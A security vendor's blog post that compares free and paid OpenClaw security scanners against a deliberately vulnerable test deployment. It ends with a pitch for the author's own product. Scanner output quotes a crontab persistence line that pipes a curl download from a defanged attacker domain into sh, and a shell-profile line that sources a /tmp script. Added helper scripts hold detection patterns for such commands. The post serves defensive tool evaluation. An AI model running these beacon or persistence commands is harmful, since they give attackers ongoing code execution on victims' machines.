I Ran Every Free OpenClaw Security Tool. Here's What Each One Found.
There are now over a dozen tools that claim to check the security of your OpenClaw deployment. Some are built into OpenClaw itself. Some are open-source projects. Some are commercial products with free tiers. I set up a deliberately vulnerable test deployment, ran every tool I could find against it, and documented exactly what each one caught -- and what each one missed.
I'm Peter Kwidzinski -- Platform Security Architect with 20+ years in the industry. I built BulwarkAI's security scripts, so I have an obvious bias here. I've tried to be as fair as possible, and I'll call out where my own tools fall short alongside everyone else's. If you think I've gotten something wrong, tell me and I'll update this post.
The test deployment
To make this comparison meaningful, I created a standardized test environment with known vulnerabilities. This way I could measure exactly what each tool catches against a known ground truth.
The deployment:
- OpenClaw 0.4.0 (deliberately not the latest, to test version detection)
- 12 skills installed: 8 legitimate, 4 from the ClawHavoc IOC database (known malicious)
- 3 MCP servers configured: 2 legitimate, 1 simulating the MCP proxy campaign
- Identity file modified to include a hidden API proxy endpoint (simulating CVE-2026-26102 exploitation)
- Default permissions (no hardening applied)
- One skill with a crontab persistence mechanism
- One skill with shell profile injection (.zshrc modification)
- Skills installed in both the default directory and a custom OPENCLAW_SKILLS_DIR path
Total planted issues: 14 distinct security problems across 8 categories. Let's see what each tool found.
Tool 1: OpenClaw Built-In Security Audit
Command: openclaw security audit
Cost: Free (included with OpenClaw)
Type: CLI tool, runs locally
Time to run: ~5 seconds
$ openclaw security audit
OpenClaw Security Audit v0.4.0
================================
[WARN] OpenClaw version 0.4.0 is outdated (latest: 0.4.2)
[WARN] Gateway authentication not configured
[WARN] Default file permissions too broad: ~/.openclaw/skills/ is world-readable
[FAIL] 2 skills have network access without explicit allowlist
[WARN] MCP servers enabled but no authentication configured
[INFO] 12 skills installed in default directory
5 issues found (1 critical, 2 warnings, 2 info)
What it caught (5 of 14):
- Outdated OpenClaw version
- Missing gateway authentication
- Overly broad file permissions
- Skills with unrestricted network access
- MCP servers without authentication
What it missed (9 of 14):
- All 4 malicious skills (no IOC checking)
- The malicious MCP proxy server (checked config format, not server behavior)
- Modified identity file (no integrity checking)
- Crontab persistence mechanism
- Shell profile injection
- Skills in the custom directory (only checked the default path)
Verdict: The built-in audit is a necessary first step. It catches configuration issues and obvious misconfigurations. But it has no concept of malicious skills, no integrity monitoring, and no persistence detection. This is what I call the "60% baseline" -- it covers the easy stuff and misses the hard stuff. Run it, fix what it flags, then keep going with other tools.
Tool 2: SecureClaw
Command: secureclaw scan
Cost: Free, open-source (MIT license)
Type: CLI tool, runs locally
Time to run: ~12 seconds
$ secureclaw scan
SecureClaw v1.2.0 - OpenClaw Security Scanner
==============================================
Scanning skill directory: ~/.openclaw/skills/
Scanning 12 skills...
[HIGH] Skill 'openclw-gmail' matches known malicious pattern (typosquat)
[HIGH] Skill 'claw-slack-bot' matches known malicious pattern (typosquat)
[WARN] Skill 'data-pipeline-pro' has suspicious install script (curl | sh)
[HIGH] Outdated OpenClaw version: 0.4.0 (CVE-2026-25253, CVE-2026-26102 unpatched)
[WARN] 3 skills request filesystem write access outside their directory
[WARN] MCP server 'analytics-proxy' connects to unverified endpoint
[INFO] Gateway authentication not configured
7 issues found (3 high, 3 warnings, 1 info)
What it caught (7 of 14):
- 2 of 4 malicious skills (typosquat detection via name similarity matching)
- 1 suspicious install script (pattern matching for curl | sh)
- Outdated version with specific CVE references
- Overly broad write permissions
- Suspicious MCP server endpoint
- Missing gateway authentication
What it missed (7 of 14):
- 2 of 4 malicious skills (the ones that weren't typosquats -- they had original names but malicious payloads)
- Modified identity file
- Crontab persistence mechanism
- Shell profile injection
- Skills in the custom directory (same limitation as built-in audit)
- The MCP proxy attack (flagged the endpoint as "unverified" but didn't identify the proxy behavior)
- Default file permissions issue
Verdict: A meaningful improvement over the built-in audit. SecureClaw's typosquat detection is genuinely useful -- it caught two malicious skills that the built-in audit completely missed. The CVE-specific version checking is also helpful. But it still only scans the default skill directory, has no persistence detection, and its IOC database is smaller than BulwarkAI's. For a free, open-source tool, it's solid. For a deeper comparison, see our SecureClaw vs BulwarkAI analysis.
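Name-similarity matching of the kind credited above can be implemented as an edit-distance check. This is an added example, not SecureClaw's code; the known-good list, the `typosquats` function and the distance threshold of 2 are assumptions made for illustration.

```bash
# Added example: name-similarity typosquat check. KNOWN_GOOD is a constructed
# list of trusted skill names (an assumption, not a real registry export).
KNOWN_GOOD="openclaw-gmail claw-slackbot project-automator"

# typosquats MAX_DIST "known names": reads installed skill names on stdin and
# prints "installed ~ known distance" for near-misses (0 < distance <= MAX_DIST).
typosquats() {
    awk -v max="$1" -v known="$2" '
        function min3(a, b, c) { return a < b ? (a < c ? a : c) : (b < c ? b : c) }
        # Levenshtein edit distance; i, j, m, n, d, cost are awk locals.
        function lev(s, t,    i, j, m, n, d, cost) {
            m = length(s); n = length(t)
            for (i = 0; i <= m; i++) d[i, 0] = i
            for (j = 0; j <= n; j++) d[0, j] = j
            for (i = 1; i <= m; i++)
                for (j = 1; j <= n; j++) {
                    cost = (substr(s, i, 1) == substr(t, j, 1)) ? 0 : 1
                    d[i, j] = min3(d[i-1, j] + 1, d[i, j-1] + 1, d[i-1, j-1] + cost)
                }
            return d[m, n]
        }
        BEGIN { nk = split(known, k, " ") }
        NF {
            for (x = 1; x <= nk; x++) {
                dist = lev($1, k[x])
                if (dist > 0 && dist <= max) print $1, "~", k[x], dist
            }
        }
    '
}

# Constructed sample: skill names taken from the tool output in this post.
sample_skills() {
    printf '%s\n' openclw-gmail claw-slack-bot crypto-helper-2026 \
        data-pipeline-pro project-automator
}

sample_skills | typosquats 2 "$KNOWN_GOOD"
```

The skills with original names produce no output, which is the gap described above: name similarity cannot flag a malicious skill that is not imitating a trusted one.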
Tool 3: Aikido.dev OpenClaw Scanner
Access: Web-based scanner at aikido.dev
Cost: Free tier (limited scans per month), paid plans available
Type: Cloud-based, requires uploading config files or connecting your repository
Time to run: ~30 seconds (includes upload time)
Aikido OpenClaw Security Scan Results
======================================
Risk Score: 72/100 (High Risk)
CRITICAL:
- OpenClaw version 0.4.0 has 2 unpatched CVEs
(CVE-2026-25253: Skill Sandbox Escape, CVSS 9.1)
(CVE-2026-26102: Identity File Injection, CVSS 7.8)
HIGH:
- Skill 'openclw-gmail' flagged as malicious (ClawHavoc database match)
- Skill 'claw-slack-bot' flagged as malicious (ClawHavoc database match)
- Skill 'crypto-helper-2026' flagged as malicious (behavioral analysis)
- MCP server 'analytics-proxy' communicates with known C2 domain
MEDIUM:
- 3 skills have excessive filesystem permissions
- Identity file contains non-standard API endpoint configuration
- Gateway authentication not configured
LOW:
- 2 skills have unscoped network access
11 issues found
What it caught (9 of 14):
- 3 of 4 malicious skills (typosquat detection plus behavioral analysis)
- Outdated version with CVE details
- MCP proxy server identified via C2 domain matching
- Modified identity file (detected non-standard endpoint, though didn't identify it as CVE-2026-26102 exploitation specifically)
- Excessive filesystem permissions
- Missing gateway authentication
- Unscoped network access
What it missed (5 of 14):
- 1 of 4 malicious skills (the one with a clean manifest but malicious behavior at runtime)
- Crontab persistence mechanism
- Shell profile injection
- Skills in the custom directory
- Default file permissions on the skill directory itself
Verdict: The strongest showing of any tool in this test. Aikido's behavioral analysis caught a malicious skill that both the built-in audit and SecureClaw missed. Their C2 domain database is well-maintained and caught the MCP proxy campaign. The identity file anomaly detection is a nice touch. The main weaknesses are the same as everyone else: no persistence detection, no custom directory scanning, and the cloud-based model means you're sharing your config with a third party. The free tier limits are also restrictive -- you'll need a paid plan for regular scanning.
Tool 4: BulwarkAI Audit Scripts
Command: bash bulwarkai-audit.sh (from the Security Blueprint)
Cost: $97 (part of the Security Blueprint); free scanner available at bulwarkai.io for basic checks
Type: Local bash scripts + browser-based scanner
Time to run: ~8 seconds (local scripts), ~3 seconds (free scanner)
$ bash bulwarkai-audit.sh
BulwarkAI Security Audit v2.1
================================
[PHASE 1: Version & Config]
[CRIT] OpenClaw 0.4.0 - UNPATCHED: CVE-2026-25253, CVE-2026-25891, CVE-2026-26102
[HIGH] Gateway authentication disabled
[HIGH] Default file permissions: ~/.openclaw/skills/ is 755 (should be 700)
[PHASE 2: Skill Scanning - All Directories]
Scanning: ~/.openclaw/skills/ (12 skills)
Scanning: ~/projects/custom-skills/ (3 skills)
[CRIT] openclw-gmail - IOC MATCH (ClawHavoc #CH-0147, typosquat)
[CRIT] claw-slack-bot - IOC MATCH (ClawHavoc #CH-0291, typosquat)
[CRIT] crypto-helper-2026 - IOC MATCH (ClawHavoc #CH-0834, cryptominer)
[HIGH] data-pipeline-pro - SUSPICIOUS: install script contains curl | sh
[WARN] project-automator has network access without allowlist
[PHASE 3: Identity & Config Integrity]
[CRIT] identity.json MODIFIED - contains non-standard API proxy endpoint
Expected hash: a3f8c2... Current hash: 7b1d9e...
DIFF: Added "proxy_endpoint": "https://api-mirror.clawtools[.]net/v1"
[PHASE 4: MCP Server Audit]
[CRIT] MCP server 'analytics-proxy' endpoint resolves to known C2 IP
[HIGH] MCP server 'analytics-proxy' registered by skill 'data-pipeline-pro'
[WARN] MCP server authentication uses empty-header bypass (CVE-2026-25891)
[PHASE 5: Persistence Detection]
[HIGH] Crontab entry found: */15 * * * * curl -s https://clawtools[.]net/beacon | sh
Likely installed by: crypto-helper-2026
[HIGH] Shell profile modified: ~/.zshrc contains appended code block
Line 47-52: sources script from /tmp/.openclaw-helper.sh
Likely installed by: data-pipeline-pro
[PHASE 6: Network Analysis]
[WARN] 3 skills have network access without explicit allowlist
[INFO] Outbound connections observed to 2 unexpected domains
13 issues found (5 critical, 4 high, 3 warnings, 1 info)
Full report: ./bulwarkai-audit-report-2026-03-03.json
What it caught (13 of 14):
- 3 of 4 malicious skills (IOC database match + suspicious pattern detection)
- Outdated version with all three CVE references
- Modified identity file with specific diff showing the injected proxy endpoint
- MCP proxy server identified via C2 IP resolution and skill correlation
- Crontab persistence mechanism with attribution to the installing skill
- Shell profile injection with line-level detail
- Skills in the custom directory (multi-directory scanning)
- Gateway authentication, file permissions, network access issues
What it missed (1 of 14):
- 1 of 4 malicious skills (same one Aikido missed -- clean manifest, no IOC match, malicious only at runtime). This skill would require dynamic analysis or runtime monitoring to catch, which no current tool does.
Verdict: Full disclosure -- I built this, so take my assessment with appropriate skepticism. The multi-directory scanning, persistence detection, and identity file integrity checking are capabilities that no other tool in this comparison offers. The IOC database is the largest at 1,184+ entries. The main limitation is the same as everyone else's: it can't catch skills that are only malicious at runtime. The other limitation is cost -- the full scripts require the Security Blueprint purchase, though the free scanner at bulwarkai.io covers the basics.
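The integrity and persistence checks that separate the tools above come down to a stored hash and a few pattern searches. The functions below are an added example, not BulwarkAI's script or any other tool's code; the function names, patterns and sample files are constructed, and `.invalid` hostnames stand in for real endpoints.

```bash
# Added example: hand-rolled identity-integrity and persistence checks.
# Function names, regexes and sample data are constructed for illustration.

# sha256_of FILE: portable SHA-256 (sha256sum on Linux, shasum on macOS).
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | awk '{print $1}'
    else
        shasum -a 256 "$1" | awk '{print $1}'
    fi
}

# identity_modified FILE BASELINE_HASH: succeeds (exit 0) when the file no
# longer matches the hash recorded while the deployment was known-good.
identity_modified() {
    [ "$(sha256_of "$1")" != "$2" ]
}

# cron_fetch_and_run: crontab text on stdin; prints non-comment entries that
# pipe a curl/wget download straight into a shell.
cron_fetch_and_run() {
    grep -v '^[[:space:]]*#' |
        grep -E '(curl|wget)[^|]*\|[[:space:]]*(ba|z|da)?sh([[:space:]]|$)'
}

# profile_tmp_sources FILE: prints "line:text" for shell-profile lines that
# source a script from a world-writable temp directory.
profile_tmp_sources() {
    grep -nE '(^|[;&|[:space:]])(\.|source)[[:space:]]+"?(/tmp|/var/tmp)/' "$1"
}

# Demo on constructed samples in a scratch directory (no live files touched).
demo() {
    d=$(mktemp -d) || return 1
    printf '%s\n' '{"api":"https://api.example.invalid"}' > "$d/identity.json"
    base=$(sha256_of "$d/identity.json")   # baseline taken before tampering
    printf '%s\n' '{"api":"https://api.example.invalid","proxy_endpoint":"https://mirror.example.invalid/v1"}' \
        > "$d/identity.json"
    identity_modified "$d/identity.json" "$base" && echo "identity.json differs from baseline"
    printf '%s\n' '# nightly backup' \
        '*/15 * * * * curl -s https://example.invalid/beacon | sh' | cron_fetch_and_run
    printf '%s\n' 'export EDITOR=vim' 'source /tmp/.openclaw-helper.sh' > "$d/zshrc"
    profile_tmp_sources "$d/zshrc"
    rm -rf "$d"
}
demo
```

On a live system the same functions take `crontab -l` output on stdin and the real profile and identity file paths as arguments; the baseline hash has to be recorded before any untrusted skill is installed.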
Tool 5: VirusTotal / Manual Upload
Access: Upload files at virustotal.com
Cost: Free
Type: Cloud-based, file-by-file analysis
Time to run: ~60 seconds per file (manual upload process)
VirusTotal isn't an OpenClaw-specific tool, but several people have recommended it for checking skill files. I tested it by uploading each of the 4 malicious skill packages.
VirusTotal Results (per-file upload):
openclw-gmail.zip: 2/72 engines flagged (Generic.Trojan.Agent, Malware.Generic)
claw-slack-bot.zip: 0/72 engines flagged
crypto-helper-2026.zip: 8/72 engines flagged (Coinminer, PUA.CryptoMiner)
data-pipeline-pro.zip: 1/72 engines flagged (Suspicious.Script.Download)
What it caught (2 of 14):
- The cryptominer skill (multiple engines recognized XMRig components)
- Partial detection of the typosquat skill (low confidence, 2 engines)
What it missed (12 of 14):
- 2 of 4 malicious skills entirely (the typosquats looked like legitimate code to traditional AV)
- All configuration and deployment-level issues (VirusTotal analyzes files, not deployments)
- MCP proxy, identity file modification, persistence, permissions -- none of these are in scope
Verdict: VirusTotal is not the right tool for this job. It's designed for traditional malware analysis, and most OpenClaw threats don't look like traditional malware. A malicious skill is often perfectly legitimate code that does something the user didn't authorize -- that's a context problem, not a signature problem. VirusTotal is useful if you suspect a skill packages a known malware binary (like the XMRig cryptominer), but it won't catch the majority of OpenClaw-specific threats. Don't rely on it as your primary tool.
The overlap matrix
Here's the complete picture -- every planted issue and which tools caught it.
| Security Issue | Built-In | SecureClaw | Aikido | BulwarkAI | VirusTotal |
|---|---|---|---|---|---|
| Outdated OpenClaw version | ✓ | ✓ | ✓ | ✓ | ✗ |
| Missing gateway auth | ✓ | ✓ | ✓ | ✓ | ✗ |
| Broad file permissions | ✓ | ✗ | ✗ | ✓ | ✗ |
| Unrestricted network access | ✓ | ✓ | ✓ | ✓ | ✗ |
| MCP auth not configured | ✓ | ✗ | ✗ | ✓ | ✗ |
| Malicious skill: typosquat #1 | ✗ | ✓ | ✓ | ✓ | ~ |
| Malicious skill: typosquat #2 | ✗ | ✓ | ✓ | ✓ | ✗ |
| Malicious skill: cryptominer | ✗ | ✗ | ✓ | ✓ | ✓ |
| Malicious skill: runtime-only | ✗ | ✗ | ✗ | ✗ | ✗ |
| MCP proxy attack | ✗ | ~ | ✓ | ✓ | ✗ |
| Modified identity file | ✗ | ✗ | ~ | ✓ | ✗ |
| Crontab persistence | ✗ | ✗ | ✗ | ✓ | ✗ |
| Shell profile injection | ✗ | ✗ | ✗ | ✓ | ✗ |
| Custom directory skills | ✗ | ✗ | ✗ | ✓ | ✗ |
| Total caught | 5 / 14 | 7 / 14 | 9 / 14 | 13 / 14 | 2 / 14 |
Legend: ✓ = caught, ✗ = missed, ~ = partial detection (flagged but didn't fully identify the issue)
What you should actually run
Based on this testing, here's my recommendation for what to run and in what order. This isn't "pick one" -- it's "run them in layers."
Layer 1: The baseline (free, everyone should do this)
- Run openclaw security audit. Fix everything it flags. Takes 5 minutes. No excuse not to do this.
- Run SecureClaw. Free, open-source, catches things the built-in audit misses. Especially useful for typosquat detection. Takes 2 minutes to install and run.
- Run the free BulwarkAI scanner. Browser-based, no account needed. Checks your skills against the IOC database. Takes 30 seconds.
This three-layer free stack gets you to about 7-8 of 14 issues caught. Better than any single free tool alone.
Layer 2: Deeper scanning (free tier or paid)
- Run Aikido's scanner. The behavioral analysis and C2 domain matching add value beyond what the free tools catch. The free tier gives you limited scans per month -- use them for initial assessment and after any significant changes.
This gets you to about 9-10 of 14 issues caught.
Layer 3: Full coverage (paid)
- Run BulwarkAI's audit scripts. The multi-directory scanning, persistence detection, identity integrity monitoring, and MCP deep audit cover the gaps that all free tools miss. This gets you to 13 of 14. The only thing no tool catches is runtime-only malicious behavior.
Layer 4: What no tool catches (manual)
The 14th issue -- the skill that's clean on disk but malicious at runtime -- requires either:
- Runtime monitoring: Watching what the skill actually does when it executes. No current tool offers this for OpenClaw, though I expect it's coming.
- Network monitoring: Capturing outbound traffic from your OpenClaw process and reviewing it for unexpected destinations. You can do this manually with:
# Monitor OpenClaw network connections in real-time
# macOS:
sudo lsof -i -P | grep openclaw
# Linux:
ss -tnp | grep openclaw
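# Or capture DNS queries (tcpdump output carries no process names, so review
# the queried domains themselves instead of grepping for openclaw):
sudo tcpdump -l -n -i any port 53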
This is the gap that the entire ecosystem needs to close. Until we have runtime behavioral analysis for OpenClaw skills, there will always be threats that static analysis can't catch.
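The `ss` check above becomes reviewable when its output is compared against the hosts you expect. This is an added example, not part of the original post's tooling; the function name, the allowlist and the sample `ss` lines (documentation-range addresses) are constructed.

```bash
# Added example: flag connections from one process to hosts that are not on an
# allowlist, using saved or piped `ss -tnp` output.

# unexpected_peers PROC "allowed hosts": ss -tnp output on stdin; prints
# "count peer:port" for each remote endpoint PROC holds that is not allowed.
# IPv6 peers appear as [addr]:port, so list them in the allowlist with brackets.
unexpected_peers() {
    awk -v proc="$1" -v allow="$2" '
        BEGIN { n = split(allow, a, " "); for (i = 1; i <= n; i++) ok[a[i]] = 1 }
        # Skip the header; keep rows whose Process column names PROC.
        $1 != "State" && index($0, "(\"" proc "\",") {
            host = $5; sub(/:[0-9]+$/, "", host)   # strip the port
            if (!(host in ok)) seen[$5]++
        }
        END { for (p in seen) print seen[p], p }
    ' | sort -k2
}

# Constructed sample of `ss -tnp` output.
sample_ss() {
    cat <<'EOF'
State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
ESTAB 0 0 192.168.1.10:52144 198.51.100.20:443 users:(("openclaw",pid=4121,fd=23))
ESTAB 0 0 192.168.1.10:52150 203.0.113.7:443 users:(("openclaw",pid=4121,fd=27))
ESTAB 0 0 192.168.1.10:52151 203.0.113.7:443 users:(("openclaw",pid=4121,fd=28))
ESTAB 0 0 192.168.1.10:40022 203.0.113.99:22 users:(("ssh",pid=900,fd=3))
EOF
}

# 198.51.100.20 stands in for an API host you expect; the rest is reported.
sample_ss | unexpected_peers openclaw "198.51.100.20"

# Live use on Linux: sudo ss -tnp | unexpected_peers openclaw "$ALLOWED_HOSTS"
```

On macOS, where `ss` is unavailable, the `lsof` output above has a different column layout and needs its own parser.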
A note on fairness
I want to be transparent about a few things:
I built BulwarkAI. I have a financial incentive for it to look good in this comparison. I've tried to be fair by using a standardized test with planted issues and documenting exactly what each tool caught. The results are reproducible -- I'm happy to share the test deployment configuration with anyone who wants to verify.
These tools serve different audiences. The built-in audit is for everyone. SecureClaw is for technically comfortable users who want more coverage for free. Aikido is for teams that want SaaS-style scanning with minimal setup. BulwarkAI is for people who want the deepest local analysis with the largest IOC database. VirusTotal is for checking individual suspicious files, not for deployment-level scanning.
All of these tools are improving rapidly. OpenClaw security is a month old. By the time you read this, some of these tools may have added capabilities they didn't have during my test. SecureClaw in particular is actively developed and adding features weekly. I'll update this comparison periodically.
No tool catches everything. My own tool missed 1 of 14 issues. The runtime-only malicious skill is a genuine blind spot for the entire ecosystem. If someone tells you their tool catches everything, they're either lying or they haven't tested against this class of threat.
The best defense is layered. Run multiple tools. Don't rely on any single one. The free three-layer stack (built-in + SecureClaw + BulwarkAI free scanner) catches more than any single paid tool. Layering in Aikido and the full BulwarkAI scripts gets you close to complete coverage.
Close the gaps the free tools miss
The Security Blueprint includes 3 audit scripts covering multi-directory scanning, persistence detection, identity monitoring, MCP deep audit, and the full 1,184-skill IOC database. One-time purchase, runs locally, no data leaves your machine.